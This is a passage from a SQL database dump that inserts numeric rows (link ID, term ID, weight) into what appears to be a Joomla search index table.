(255, 24206, 0.18669),
(274, 24206, 0.18669),
(239, 24206, 0.37338),
(299, 24206, 0.37338),
(178, 24206, 1.8669),
(299, 24207, 1.86662),
(178, 24207, 4.66655),
(240, 24212, 0.95669),
(242, 24212, 0.95669),
(254, 24212, 0.95669),
(264, 24212, 0.95669),
(287, 24212, 0.95669),
(288, 24212, 0.95669),
(299, 24212, 0.95669),
(239, 24214, 0.14),
(244, 24214, 0.14),
(299, 24214, 0.14),
(241, 24214, 0.42),
(290, 24214, 0.7),
(178, 24214, 2.52),
(178, 24215, 0.91),
(299, 24215, 0.91),
(236, 24217, 0.14),
(264, 24217, 0.14),
(299, 24217, 0.28),
(264, 24218, 0.81669),
(299, 24218, 0.81669),
(299, 24226, 0.88669),
(244, 24226, 1.77338),
(244, 24227, 1.14331),
(299, 24227, 1.14331),
(261, 24228, 0.28),
(299, 24228, 0.28),
(274, 24233, 0.91),
(299, 24233, 1.82),
(244, 24245, 0.98),
(299, 24245, 0.98),
(273, 24253, 0.95669),
(299, 24253, 0.95669),
(244, 24255, 0.86331),
(299, 24255, 0.86331),
(249, 24267, 0.18669),
(268, 24267, 0.18669),
(288, 24267, 0.18669),
(292, 24267, 0.18669),
(174, 24267, 0.37338),
(258, 24267, 0.37338),
(299, 24267, 0.74676),
(258, 24272, 1.72662),
(299, 24272, 1.72662),
(237, 24275, 0.14),
(242, 24275, 0.14),
(254, 24275, 0.14),
(256, 24275, 0.14),
(258, 24275, 0.14),
(262, 24275, 0.14),
(269, 24275, 0.14),
(270, 24275, 0.14),
(274, 24275, 0.14),
(275, 24275, 0.14),
(290, 24275, 0.14),
(299, 24275, 0.14),
(301, 24275, 0.14),
(304, 24275, 0.14),
(261, 24275, 0.28),
(241, 24275, 0.42),
(262, 25043, 0.37331),
(272, 25043, 0.37331),
(280, 25043, 0.37331),
(298, 25043, 0.74662),
(308, 25043, 0.74662),
(168, 25048, 0.32669),
(298, 25048, 0.32669),
(308, 25048, 0.32669),
(236, 25053, 0.18669),
(240, 25053, 0.18669),
(241, 25053, 0.18669),
(246, 25053, 0.18669),
(247, 25053, 0.18669),
(263, 25053, 0.18669),
(292, 25053, 0.18669),
(298, 25053, 0.18669),
(308, 25053, 0.18669),
(254, 25053, 0.37338),
(298, 25381, 0.02331),
(301, 25381, 0.02331),
(304, 25381, 0.02331),
(178, 25381, 0.18669),
(239, 25381, 0.18669),
(241, 25381, 0.18669),
(248, 25381, 0.18669),
(258, 25381, 0.18669),
(267, 25381, 0.18669),
(270, 25381, 0.18669),
(288, 25381, 0.18669),
(290, 25381, 0.18669),
(292, 25381, 0.18669),
(308, 25381, 0.18669),
(237, 25381, 0.37338),
(242, 25381, 0.56007),
(262, 25381, 0.56007),
(268, 25381, 0.56007),
(262, 25382, 0.91),
(298, 25382, 0.91),
(308, 25382, 0.91),
(238, 25389, 1.00331),
(298, 25389, 1.00331),
(305, 25389, 1.00331),
(306, 25389, 1.00331),
(308, 25389, 1.00331),
(193, 25389, 4.01324),
(240, 25394, 1.09669),
(298, 25394, 1.09669),
(308, 25394, 1.09669),
(298, 25398, 0.91),
(304, 25398, 0.91),
(308, 25398, 0.91),
(178, 25398, 2.73),
(238, 25398, 6.37),
(298, 25399, 0.98),
(304, 25399, 0.98),
(308, 25399, 0.98),
(178, 25399, 2.94),
(238, 25399, 5.88),
(178, 25400, 1.05),
(193, 25400, 1.05),
(248, 25400, 1.05),
(255, 25400, 1.05),
(257, 25400, 1.05),
(258, 25400, 1.05),
(259, 25400, 1.05),
(260, 25400, 1.05),
(264, 25400, 1.05),
(239, 25400, 2.1),
(298, 25400, 2.1),
(308, 25400, 2.1),
(267, 25400, 3.15),
(268, 25400, 4.2),
(304, 25400, 8.4),
(305, 25400, 19.95),
(236, 25406, 0.93331),
(237, 25406, 0.93331),
(268, 25406, 0.93331),
(288, 25406, 0.93331),
(298, 25406, 0.93331),
(305, 25406, 0.93331),
(308, 25406, 0.93331),
(267, 25406, 2.79993),
(304, 25406, 2.79993),
(262, 25406, 4.66655),
(254, 25406, 7.46648),
(255, 25408, 0.88669),
(267, 25408, 0.88669),
(273, 25408, 0.88669),
(275, 25408, 0.88669),
(235, 25408, 1.77338),
(304, 25408, 1.77338),
(243, 25408, 2.66007),
(298, 25408, 2.66007),
(308, 25408, 2.66007),
(262, 25408, 6.20683),
(235, 25409, 0.95669),
(255, 25409, 0.95669),
(267, 25409, 0.95669),
(273, 25409, 0.95669),
(275, 25409, 0.95669),
(243, 25409, 1.91338),
(304, 25409, 1.91338),
(298, 25409, 2.87007),
(308, 25409, 2.87007),
(178, 25412, 0.88669),
(238, 25412, 0.88669),
(249, 25412, 0.88669),
(255, 25412, 0.88669),
(256, 25412, 0.88669),
(257, 25412, 0.88669),
(258, 25412, 0.88669),
(259, 25412, 0.88669),
(260, 25412, 0.88669),
(298, 25412, 0.88669),
(308, 25412, 0.88669),
(249, 25426, 1.00331),
(298, 25426, 1.00331),
(308, 25426, 1.00331),
(290, 25427, 0.91),
(298, 25427, 0.91),
(308, 25427, 0.91),
(275, 25427, 2.73),
(253, 25429, 0.86331),
(259, 25429, 0.86331),
(260, 25429, 0.86331),
(298, 25429, 0.86331),
(308, 25429, 0.86331),
(244, 25436, 0.88669),
(261, 25436, 0.88669),
(298, 25436, 0.88669),
(308, 25436, 0.88669),
(261, 25437, 1.00331),
(298, 25437, 1.00331),
(308, 25437, 1.00331),
(239, 25442, 0.86331),
(243, 25442, 0.86331),
(273, 25442, 0.86331),
(290, 25442, 0.86331),
(298, 25442, 0.86331),
(305, 25442, 0.86331),
(306, 25442, 0.86331),
(308, 25442, 0.86331),
(236, 25448, 0.32669),
(249, 25448, 0.32669),
(274, 25448, 0.32669),
(298, 25448, 0.32669),
(308, 25448, 0.32669),
(237, 25448, 0.65338),
(237, 25449, 0.95669),
(298, 25449, 0.95669),
(308, 25449, 0.95669),
(236, 25921, 0.23331),
(254, 25921, 0.46662),
(44, 25921, 1.06656),
(45, 25921, 1.06656),
(46, 25921, 1.06656),
(47, 25921, 1.06656),
(48, 25921, 1.06656),
(49, 25921, 1.06656),
(50, 25921, 1.06656),
(44, 25922, 2.4666),
(44, 25923, 2.9334),
(45, 25981, 2.4666),
(45, 25982, 2.9334),
(46, 25993, 2.4666),
(46, 25994, 2.9334),
(47, 26005, 1.24),
(295, 26005, 2.84),
(47, 26006, 4.34),
(295, 26006, 9.94),
(47, 26007, 5.16677),
(295, 26007, 11.8336),
(47, 26008, 2.4666),
(47, 26009, 2.9334),
(48, 26026, 2.5334),
(48, 26027, 3),
(49, 26052, 2.5334),
(49, 26053, 3),
(50, 26067, 2.5334),
(50, 26068, 3),
(193, 28856, 1.00331),
(253, 28856, 1.00331),
(193, 28857, 1.07331),
(253, 28857, 1.07331),
(178, 28870, 0.98),
(193, 28870, 0.98),
(253, 28870, 0.98),
(257, 28870, 0.98),
(258, 28870, 0.98),
(288, 28870, 0.98),
(193, 31777, 0.18669),
(236, 31777, 0.18669),
(265, 31777, 0.18669),
(266, 31777, 0.18669),
(257, 31777, 0.37338),
(242, 31777, 0.56007),
(193, 31788, 0.32669),
(236, 31788, 0.32669),
(242, 31788, 0.32669),
(243, 31788, 0.32669),
(248, 31788, 0.32669),
(275, 31788, 0.32669),
(292, 31788, 0.32669),
(193, 31803, 0.32669),
(236, 31803, 0.32669),
(240, 31803, 0.32669),
(193, 32709, 0.88669),
(241, 32709, 0.88669),
(254, 32709, 0.88669),
(269, 32709, 0.88669),
(273, 32709, 0.88669),
(305, 32709, 0.88669),
(243, 32709, 1.77338),
(168, 32722, 0.18669),
(174, 32722, 0.18669),
(193, 32722, 0.18669),
(236, 32722, 0.18669),
(244, 32722, 0.18669),
(246, 32722, 0.18669),
(235, 32722, 0.37338),
(178, 32738, 0.91),
(235, 32738, 0.91),
(238, 32738, 0.91),
(241, 32738, 0.91),
(244, 32738, 0.91),
(248, 32738, 0.91),
(249, 32738, 0.91),
(255, 32738, 0.91),
(258, 32738, 0.91),
(259, 32738, 0.91),
(260, 32738, 0.91),
(261, 32738, 0.91),
(288, 32738, 0.91),
(304, 32738, 0.91),
(174, 32738, 1.82),
(240, 32738, 1.82),
(193, 32738, 5.46),
(193, 32777, 1.00331),
(237, 32777, 1.00331),
(239, 32777, 1.00331),
(240, 32777, 1.00331),
(242, 32777, 1.00331),
(244, 32777, 1.00331),
(254, 32777, 1.00331),
(264, 32777, 1.00331),
(295, 32777, 1.00331),
(254, 32784, 0.91),
(259, 32784, 0.91),
(260, 32784, 0.91),
(193, 32784, 1.82),
(193, 32789, 0.95669),
(239, 32789, 0.95669),
(241, 32789, 0.95669),
(242, 32789, 0.95669),
(248, 32789, 0.95669),
(274, 32789, 0.95669),
(275, 32789, 0.95669),
(236, 32789, 1.91338),
(261, 32789, 1.91338),
(306, 32789, 2.87007),
(193, 32815, 0.93331),
(236, 32815, 0.93331),
(239, 32815, 0.93331),
(257, 32815, 0.93331),
(292, 32815, 0.93331),
(306, 32815, 0.93331),
(243, 32815, 1.86662),
(193, 32826, 1.05),
(254, 32826, 1.05),
(193, 32828, 0.91),
(236, 32828, 0.91),
(239, 32828, 0.91),
(263, 32828, 0.91),
(305, 32828, 0.91),
(193, 32836, 0.93331),
(236, 32836, 0.93331),
(254, 32836, 0.93331),
(288, 32836, 0.93331),
(178, 32850, 0.23331),
(242, 32850, 0.23331),
(243, 32850, 0.23331),
(246, 32850, 0.23331),
(254, 32850, 0.23331),
(264, 32850, 0.23331),
(306, 32850, 0.23331),
(193, 32850, 0.46662),
(193, 32896, 0.86331),
(254, 32896, 0.86331),
(262, 32896, 0.86331),
(269, 32896, 0.86331),
(272, 32896, 0.86331),
(273, 32896, 0.86331),
(280, 32896, 0.86331),
(306, 32896, 0.86331),
(261, 32896, 1.72662),
(292, 32896, 1.72662),
(241, 32896, 2.58993),
(253, 36502, 1.00331),
(273, 36502, 1.00331),
(174, 36504, 0.23331),
(237, 36504, 0.23331),
(253, 36504, 0.23331),
(256, 36504, 0.23331),
(288, 36504, 0.23331),
(270, 36504, 0.46662),
(301, 36504, 0.46662),
(239, 36504, 0.69993),
(254, 36504, 0.69993),
(247, 36507, 0.32669),
(249, 36507, 0.32669),
(253, 36507, 0.32669),
(178, 36510, 0.14),
(243, 36510, 0.14),
(253, 36510, 0.14),
(275, 36510, 0.14),
(253, 36513, 0.86331),
(267, 36513, 0.86331),
(168, 37018, 0.23331),
(253, 37018, 0.23331),
(254, 37018, 0.23331),
(262, 37018, 0.23331),
(253, 37019, 0.88669),
(254, 37019, 0.88669),
(262, 37019, 0.88669),
(237, 37023, 0.88669),
(242, 37023, 0.88669),
(253, 37023, 0.88669),
(259, 37023, 0.88669),
(260, 37023, 0.88669),
(290, 37023, 0.88669),
(174, 37027, 0.91),
(237, 37027, 0.91),
(253, 37027, 0.91),
(256, 37027, 0.91),
(288, 37027, 0.91),
(270, 37027, 1.82),
(301, 37027, 1.82),
(239, 37027, 2.73),
(254, 37027, 2.73),
(253, 37033, 0.88669),
(274, 37033, 0.88669),
(292, 37033, 2.66007),
(275, 37033, 8.10688),
(178, 37037, 0.91),
(253, 37037, 0.91),
(178, 37038, 0.98),
(253, 37038, 0.98),
(235, 37039, 0.86331),
(239, 37039, 0.86331),
(253, 37039, 0.86331),
(236, 37048, 1.00331),
(242, 37048, 1.00331),
(253, 37048, 1.00331),
(262, 37048, 1.00331),
(269, 37048, 1.00331),
(253, 37054, 0.95669),
(275, 37054, 0.95669),
(239, 37059, 0.88669),
(240, 37059, 0.88669),
(253, 37059, 0.88669),
(168, 37063, 0.93331),
(174, 37063, 0.93331),
(241, 37063, 0.93331),
(253, 37063, 0.93331),
(292, 37063, 0.93331),
(295, 37063, 1.86662),
(168, 37064, 1.00331),
(241, 37064, 1.00331),
(253, 37064, 1.00331),
(292, 37064, 1.00331),
(295, 37064, 2.00662),
(253, 37067, 1.00331),
(255, 37067, 2.00662),
(237, 37069, 0.18669),
(241, 37069, 0.18669),
(246, 37069, 0.18669),
(253, 37069, 0.18669),
(254, 37069, 0.18669),
(255, 37069, 0.18669),
(256, 37069, 0.18669),
(257, 37069, 0.18669);
INSERT INTO `y57u5_finder_links_termse` (`link_id`, `term_id`, `weight`) VALUES
(258, 37069, 0.18669),
(259, 37069, 0.18669),
(260, 37069, 0.18669),
(263, 37069, 0.18669),
(264, 37069, 0.18669),
(265, 37069, 0.18669),
(266, 37069, 0.18669),
(267, 37069, 0.18669),
(268, 37069, 0.18669),
(269, 37069, 0.18669),
(270, 37069, 0.18669),
(272, 37069, 0.18669),
(274, 37069, 0.18669),
(275, 37069, 0.18669),
(280, 37069, 0.18669),
(287, 37069, 0.18669),
(288, 37069, 0.18669),
(292, 37069, 0.18669),
(301, 37069, 0.18669),
(304, 37069, 0.18669),
(261, 37069, 0.37338),
(262, 37069, 0.37338),
(273, 37069, 0.37338),
(305, 37069, 0.37338),
(237, 37070, 0.91),
(241, 37070, 0.91),
(253, 37070, 0.91),
(254, 37070, 0.91),
(255, 37070, 0.91),
(256, 37070, 0.91),
(257, 37070, 0.91),
(258, 37070, 0.91),
(259, 37070, 0.91),
(260, 37070, 0.91),
(261, 37070, 0.91),
(262, 37070, 0.91),
(263, 37070, 0.91),
(264, 37070, 0.91),
(265, 37070, 0.91),
(266, 37070, 0.91),
(267, 37070, 0.91),
(268, 37070, 0.91),
(269, 37070, 0.91),
(270, 37070, 0.91),
(272, 37070, 0.91),
(273, 37070, 0.91),
(274, 37070, 0.91),
(275, 37070, 0.91),
(280, 37070, 0.91),
(288, 37070, 0.91),
(292, 37070, 0.91),
(301, 37070, 0.91),
(304, 37070, 0.91),
(305, 37070, 0.91),
(253, 37082, 0.86331),
(270, 37082, 0.86331),
(301, 37082, 0.86331),
(239, 37084, 0.98),
(253, 37084, 0.98),
(270, 37084, 0.98),
(301, 37084, 0.98),
(241, 37096, 0.84),
(253, 37096, 0.84),
(259, 37096, 0.84),
(260, 37096, 0.84),
(265, 37096, 0.84),
(266, 37096, 0.84),
(238, 45851, 0.14),
(243, 45851, 0.14),
(244, 45851, 0.14),
(246, 45851, 0.14),
(254, 45851, 0.14),
(259, 45851, 0.14),
(260, 45851, 0.14),
(305, 45851, 0.14),
(236, 45851, 0.28),
(240, 45851, 0.28),
(241, 45851, 0.28),
(236, 46426, 0.93331),
(254, 46426, 0.93331),
(168, 46440, 0.88669),
(236, 46440, 0.88669),
(254, 46440, 0.88669),
(267, 46440, 0.88669),
(237, 46440, 1.77338),
(178, 46449, 0.86331),
(236, 46449, 0.86331),
(239, 46449, 0.86331),
(254, 46449, 0.86331),
(269, 46449, 0.86331),
(272, 46449, 0.86331),
(280, 46449, 0.86331),
(236, 46508, 1.00331),
(262, 46508, 2.00662),
(254, 46508, 7.02317),
(235, 46531, 0.93331),
(254, 46531, 0.93331),
(238, 46531, 7.59981),
(243, 46531, 8.53312),
(235, 46532, 1.05),
(254, 46532, 1.05),
(238, 46532, 8.55),
(243, 46532, 9.6),
(235, 50662, 0.77),
(236, 50662, 0.77),
(235, 50907, 0.42),
(305, 50907, 0.42),
(240, 50907, 1.26),
(235, 50912, 0.93331),
(238, 50912, 0.93331),
(242, 50912, 0.93331),
(235, 50914, 0.98),
(239, 50914, 0.98),
(235, 50916, 0.37331),
(246, 50916, 0.37331),
(263, 50916, 0.37331),
(178, 50919, 1.00331),
(235, 50919, 1.00331),
(275, 50919, 1.00331),
(288, 50919, 3.00993),
(235, 50929, 0.18669),
(247, 50929, 0.18669),
(174, 50929, 0.37338),
(178, 50929, 0.37338),
(235, 51396, 0.18669),
(241, 51396, 0.18669),
(245, 51396, 0.18669),
(261, 51396, 0.18669),
(273, 51396, 0.18669),
(292, 51396, 0.18669),
(304, 51396, 0.18669),
(306, 51396, 0.18669),
(244, 51396, 0.37338),
(242, 51396, 0.56007),
(235, 51399, 0.42),
(236, 51399, 0.42),
(239, 51399, 0.42),
(306, 51399, 0.42),
(235, 51402, 0.42),
(247, 51402, 0.42),
(235, 51415, 0.91),
(269, 51415, 0.91),
(168, 51417, 0.91),
(235, 51417, 0.91),
(239, 51417, 0.91),
(242, 51417, 0.91),
(249, 51417, 0.91),
(288, 51417, 0.91),
(306, 51417, 0.91),
(174, 51417, 1.82),
(235, 51418, 1.00331),
(174, 51418, 2.00662),
(235, 51420, 1.00331),
(237, 51420, 1.00331),
(257, 51420, 1.00331),
(270, 51420, 1.00331),
(301, 51420, 1.00331),
(236, 51425, 0.93331),
(239, 51425, 0.93331),
(261, 51425, 0.93331),
(292, 51425, 0.93331),
(243, 51425, 1.86662),
(235, 51425, 3.73324),
(174, 51437, 0.88669),
(235, 51437, 0.88669),
(235, 51446, 0.95669),
(258, 51446, 0.95669),
(235, 51449, 0.91),
(239, 51449, 0.91),
(235, 51454, 0.86331),
(236, 51454, 0.86331),
(239, 51454, 0.86331),
(306, 51454, 0.86331),
(235, 51455, 1.09669),
(236, 51455, 1.09669),
(306, 51455, 1.09669),
(235, 51460, 0.93331),
(236, 51460, 0.93331),
(235, 51461, 1.09669),
(236, 51461, 1.09669),
(235, 51481, 0.60669),
(236, 51481, 0.60669),
(178, 51496, 0.23331),
(235, 51496, 0.23331),
(236, 51496, 0.23331),
(238, 51496, 0.23331),
(239, 51496, 0.23331),
(241, 51496, 0.23331),
(243, 51496, 0.23331),
(262, 51496, 0.23331),
(267, 51496, 0.23331),
(274, 51496, 0.23331),
(292, 51496, 0.23331),
(244, 51496, 0.46662),
(256, 51496, 0.46662),
(269, 51496, 0.46662),
(242, 51496, 0.69993),
(306, 51496, 0.69993),
(249, 51496, 0.79992),
(174, 51496, 0.93324),
(288, 51496, 0.93324),
(265, 51496, 1.16655),
(266, 51496, 1.16655),
(240, 51496, 1.39986),
(235, 51500, 0.88669),
(241, 51500, 0.88669),
(235, 51505, 0.86331),
(241, 51505, 0.86331),
(244, 51505, 0.86331),
(245, 51505, 0.86331),
(261, 51505, 0.86331),
(264, 51505, 0.86331),
(290, 51505, 0.86331),
(304, 51505, 0.86331),
(247, 51505, 4.31655),
(235, 51506, 0.98),
(247, 51506, 0.98),
(264, 51506, 0.98),
(290, 51506, 0.98),
(235, 51510, 0.23331),
(244, 51510, 0.23331),
(305, 51510, 0.23331),
(243, 51513, 0.51331),
(235, 51513, 1.02662),
(193, 63964, 0.14),
(248, 63964, 0.14),
(258, 63964, 0.14),
(267, 63964, 0.14),
(305, 63964, 0.14),
(168, 63964, 0.28),
(178, 63964, 0.28),
(294, 63964, 0.28),
(261, 63964, 0.74),
(269, 63964, 1.14),
(168, 63967, 0.14),
(193, 63967, 0.14),
(247, 63967, 0.14),
(245, 63967, 0.74),
(240, 64483, 0.28),
(242, 64483, 0.28),
(193, 64483, 0.56),
(193, 64484, 0.91),
(240, 64484, 0.91),
(242, 64484, 0.91),
(174, 64488, 0.23331),
(193, 64488, 0.23331),
(237, 64488, 0.23331),
(256, 64488, 0.23331),
(193, 64506, 0.91),
(246, 64506, 0.91),
(193, 64520, 0.42),
(306, 64520, 0.42),
(256, 64520, 0.84),
(193, 65421, 0.91),
(287, 65421, 0.91),
(240, 65421, 1.82),
(261, 65421, 2.73),
(193, 65422, 1.07331),
(240, 65422, 1.07331),
(193, 65423, 0.32669),
(245, 65423, 0.32669),
(193, 65433, 0.98),
(238, 65433, 0.98),
(264, 65433, 0.98),
(193, 65439, 0.93331),
(244, 65439, 0.93331),
(239, 65439, 1.86662),
(193, 65442, 0.98),
(255, 65442, 0.98),
(306, 65442, 1.96),
(193, 65444, 0.91),
(239, 65444, 0.91),
(174, 65444, 1.82),
(238, 65444, 1.82),
(242, 65444, 1.82),
(243, 65444, 2.73),
(193, 65445, 1.02669),
(243, 65445, 1.02669),
(174, 65445, 2.05338),
(193, 65446, 0.98),
(248, 65446, 0.98),
(261, 65446, 0.98),
(193, 65456, 1.00331),
(239, 65456, 1.00331),
(241, 65456, 1.00331),
(255, 65456, 1.00331),
(256, 65456, 1.00331),
(193, 65471, 0.98),
(244, 65471, 0.98),
(262, 65481, 0.91),
(263, 65481, 0.91),
(264, 65481, 0.91),
(290, 65481, 0.91),
(193, 65481, 1.82),
(239, 65481, 1.82),
(193, 65485, 0.91),
(241, 65485, 0.91),
(245, 65495, 0.91),
(275, 65495, 0.91),
(306, 65495, 0.91),
(193, 65495, 2.73),
(270, 65495, 5.46),
(301, 65495, 5.46),
(193, 65498, 1.00331),
(257, 65498, 1.00331),
(258, 65498, 4.01324),
(193, 65502, 0.91),
(245, 65502, 0.91),
(168, 65504, 0.88669),
(193, 65504, 0.88669),
(245, 65504, 0.88669),
(288, 65504, 0.88669),
(240, 65504, 2.66007),
(193, 65508, 0.91),
(239, 65508, 0.91),
(264, 65508, 0.91),
(304, 65508, 0.91),
(193, 65509, 0.98),
(239, 65509, 0.98),
(264, 65509, 0.98),
(304, 65509, 0.98),
(178, 65531, 0.91),
(243, 65531, 0.91),
(292, 65531, 0.91),
(193, 65531, 1.82),
(174, 65531, 6.37),
(193, 65536, 1.05),
(237, 65536, 1.05),
(306, 65536, 1.05),
(174, 65573, 0.88669),
(193, 65573, 0.88669),
(237, 65573, 0.88669),
(193, 65575, 0.86331),
(255, 65575, 0.86331),
(237, 65577, 0.86331),
(238, 65577, 0.86331),
(243, 65577, 0.86331),
(247, 65577, 0.86331),
(269, 65577, 0.86331),
(193, 65577, 1.72662),
(306, 65577, 1.72662),
(174, 65577, 4.31655),
(174, 65578, 0.91),
(193, 65578, 0.91),
(237, 65578, 0.91),
(247, 65578, 0.91),
(193, 65586, 0.93331),
(239, 65586, 1.86662),
(243, 65601, 0.86331),
(258, 65601, 0.86331),
(269, 65601, 0.86331),
(270, 65601, 0.86331),
(274, 65601, 0.86331),
(288, 65601, 0.86331),
(301, 65601, 0.86331),
(168, 65601, 1.72662),
(193, 65601, 1.72662),
(241, 65601, 1.72662),
(259, 65601, 1.72662),
(260, 65601, 1.72662),
(267, 65601, 1.72662),
(292, 65601, 1.72662),
(306, 65601, 1.72662),
(261, 65601, 2.58993),
(193, 65604, 0.37331),
(238, 65604, 0.37331),
(263, 65604, 0.37331),
(306, 65604, 0.37331),
(272, 65604, 1.11993),
(280, 65604, 1.11993),
(259, 65604, 5.97296),
(260, 65604, 5.97296),
(193, 65605, 0.95669),
(259, 65605, 2.87007),
(260, 65605, 2.87007),
(236, 66905, 0.84),
(237, 66905, 0.84),
(241, 66905, 0.84),
(242, 66905, 0.84),
(237, 68993, 0.88669),
(240, 68993, 0.88669),
(244, 68993, 0.88669),
(254, 68993, 0.88669),
(264, 68993, 0.88669),
(292, 68993, 0.88669),
(237, 68994, 1.05),
(254, 68994, 1.05),
(237, 69014, 0.91),
(254, 69014, 0.91),
(237, 69036, 0.91),
(241, 69036, 0.91),
(256, 69036, 1.82),
(287, 69036, 1.82),
(254, 69036, 6.37),
(237, 69045, 1.02669),
(241, 69045, 1.02669),
(254, 69045, 1.02669),
(255, 69045, 1.02669),
(256, 69045, 1.02669),
(257, 69045, 1.02669),
(258, 69045, 1.02669),
(259, 69045, 1.02669),
(260, 69045, 1.02669),
(261, 69045, 1.02669),
(262, 69045, 1.02669),
(263, 69045, 1.02669),
(264, 69045, 1.02669),
(265, 69045, 1.02669),
(266, 69045, 1.02669),
(267, 69045, 1.02669),
(268, 69045, 1.02669),
(269, 69045, 1.02669),
(270, 69045, 1.02669),
(272, 69045, 1.02669),
(273, 69045, 1.02669),
(274, 69045, 1.02669),
(275, 69045, 1.02669),
(280, 69045, 1.02669),
(288, 69045, 1.02669),
(292, 69045, 1.02669),
(301, 69045, 1.02669),
(304, 69045, 1.02669),
(305, 69045, 1.02669),
(237, 74680, 0.93331),
(238, 74680, 0.93331),
(259, 74680, 0.93331),
(260, 74680, 0.93331),
(267, 74680, 0.93331),
(237, 74681, 1.02669),
(238, 74681, 1.02669),
(259, 74681, 1.02669),
(260, 74681, 1.02669),
(237, 74727, 0.88669),
(238, 74727, 0.88669),
(237, 74729, 0.88669),
(238, 74729, 0.88669),
(254, 75534, 0.93331),
(258, 75534, 0.93331),
(254, 76068, 0.86331),
(257, 76068, 0.86331),
(265, 76068, 0.86331),
(266, 76068, 0.86331),
(241, 76068, 3.45324),
(254, 76069, 0.93331),
(241, 76069, 1.86662),
(174, 76072, 0.23331),
(242, 76072, 0.23331),
(258, 76072, 0.23331),
(262, 76072, 0.23331),
(306, 76072, 0.23331),
(238, 76072, 0.46662),
(254, 76072, 0.93324),
(243, 76080, 0.23331),
(254, 76080, 0.23331),
(305, 76080, 0.23331),
(306, 76080, 0.46662),
(256, 76096, 0.95669),
(254, 76096, 2.87007),
(254, 76113, 1.05),
(262, 76113, 1.05),
(238, 76125, 0.88669),
(242, 76125, 0.88669),
(254, 76125, 0.88669),
(238, 76126, 0.95669),
(242, 76126, 0.95669),
(254, 76126, 0.95669),
(254, 76127, 0.98),
(256, 76127, 0.98),
(259, 76127, 0.98),
(260, 76127, 0.98),
(242, 76140, 0.91),
(248, 76140, 0.91),
(258, 76140, 0.91),
(263, 76140, 0.91),
(264, 76140, 0.91),
(272, 76140, 0.91),
(280, 76140, 0.91),
(304, 76140, 0.91),
(174, 76140, 1.82),
(238, 76140, 2.73),
(254, 76140, 2.73),
(174, 76143, 0.88669),
(254, 76143, 0.88669),
(274, 76143, 0.88669),
(273, 76143, 1.77338),
(241, 76150, 0.86331),
(254, 76150, 0.86331),
(261, 76150, 0.86331),
(290, 76150, 0.86331),
(239, 76182, 0.88669),
(254, 76182, 0.88669),
(263, 76182, 0.88669),
(267, 76182, 0.88669),
(272, 76182, 0.88669),
(280, 76182, 0.88669),
(254, 76199, 0.86331),
(265, 76199, 0.86331),
(266, 76199, 0.86331),
(254, 76204, 0.86331),
(275, 76204, 0.86331),
(305, 76204, 1.72662),
(178, 76206, 0.81669),
(254, 76206, 0.81669),
(292, 76206, 0.81669),
(254, 76218, 0.81669),
(256, 76218, 0.81669),
(269, 76218, 0.81669),
(239, 76218, 1.63338),
(258, 76218, 1.63338),
(265, 76218, 1.63338),
(266, 76218, 1.63338),
(174, 76222, 0.88669),
(245, 76222, 0.88669),
(254, 76222, 0.88669),
(306, 76222, 0.88669),
(245, 76226, 0.23331),
(246, 76226, 0.46662),
(254, 76226, 0.69993),
(240, 76226, 0.93324),
(254, 76233, 0.93331),
(274, 76233, 0.93331),
(236, 77357, 0.86331),
(243, 77357, 0.86331),
(236, 77368, 0.14),
(238, 77368, 0.14),
(247, 77368, 0.74),
(236, 77380, 0.86331),
(238, 77380, 0.86331),
(236, 77647, 0.28),
(273, 77647, 0.28),
(236, 77650, 0.88669),
(238, 77650, 0.88669),
(236, 77654, 0.14),
(246, 77654, 0.14),
(264, 77654, 0.14),
(236, 77660, 0.56),
(249, 77660, 0.56),
(236, 77679, 0.32669),
(249, 77679, 0.65338),
(236, 77680, 0.93331),
(249, 77680, 1.86662),
(236, 77682, 0.14),
(238, 77682, 0.14),
(236, 78159, 1.05),
(241, 78159, 1.05),
(178, 78165, 0.18669),
(236, 78165, 0.18669),
(178, 78177, 0.93331),
(236, 78177, 0.93331),
(236, 78181, 1.00331),
(243, 78181, 1.00331),
(236, 78183, 0.91),
(240, 78183, 0.91),
(242, 78183, 0.91),
(236, 78185, 0.86331),
(249, 78185, 0.86331),
(268, 78187, 0.86331),
(236, 78187, 1.72662),
(236, 78189, 1.00331),
(243, 78189, 1.00331),
(246, 78189, 1.00331),
(178, 78199, 0.91),
(236, 78199, 0.91),
(239, 78199, 0.91),
(244, 78199, 0.91),
(263, 78199, 0.91),
(264, 78199, 0.91),
(306, 78199, 0.91),
(269, 78199, 1.82),
(240, 78199, 2.73),
(236, 78201, 0.95669),
(249, 78201, 1.91338),
(236, 78202, 1.02669),
(249, 78202, 2.05338),
(236, 78203, 0.91),
(238, 78203, 0.91),
(245, 78203, 0.91),
(248, 78203, 0.91),
(249, 78203, 0.91),
(236, 78204, 1.02669),
(249, 78204, 1.02669),
(236, 78205, 0.88669),
(239, 78205, 0.88669),
(272, 78205, 0.88669),
(280, 78205, 0.88669),
(168, 78205, 1.77338),
(275, 78205, 8.10688),
(239, 78207, 1.02669),
(242, 78207, 1.02669),
(248, 78207, 1.02669),
(236, 78207, 2.05338),
(236, 78209, 0.95669),
(257, 78209, 0.95669),
(258, 78209, 0.95669),
(243, 78216, 0.95669),
(236, 78216, 2.87007),
(236, 78219, 1.02669),
(243, 78219, 1.02669),
(236, 78221, 1.00331),
(239, 78221, 1.00331),
(243, 78221, 2.00662),
(174, 78228, 1.00331),
(236, 78228, 1.00331),
(178, 78230, 0.86331),
(236, 78230, 0.86331),
(239, 78230, 0.86331),
(242, 78230, 0.86331),
(255, 78230, 0.86331),
(256, 78230, 0.86331),
(178, 78231, 0.95669),
(236, 78231, 0.95669),
(238, 78253, 0.88669),
(264, 78253, 0.88669),
(270, 78253, 0.88669),
(290, 78253, 0.88669),
(301, 78253, 0.88669),
(236, 78253, 1.77338),
(239, 78253, 1.77338),
(242, 78253, 1.77338),
(243, 78253, 1.77338),
(258, 78253, 1.77338),
(261, 78253, 1.77338),
(272, 78253, 1.77338),
(280, 78253, 1.77338),
(178, 78253, 2.66007),
(174, 78253, 4.43345),
(236, 78262, 1.00331),
(243, 78262, 2.00662),
(236, 78264, 0.95669),
(243, 78264, 0.95669),
(236, 78265, 1.02669),
(243, 78265, 1.02669),
(178, 78266, 0.93331),
(236, 78266, 0.93331),
(241, 78266, 0.93331),
(243, 78266, 0.93331),
(244, 78266, 0.93331),
(292, 78266, 0.93331),
(249, 78266, 3.19992),
(236, 78275, 0.32669),
(269, 78275, 0.32669),
(236, 78284, 0.91),
(264, 78284, 0.91),
(236, 78288, 0.84),
(240, 78288, 0.84),
(236, 78297, 0.88669),
(249, 78297, 0.88669),
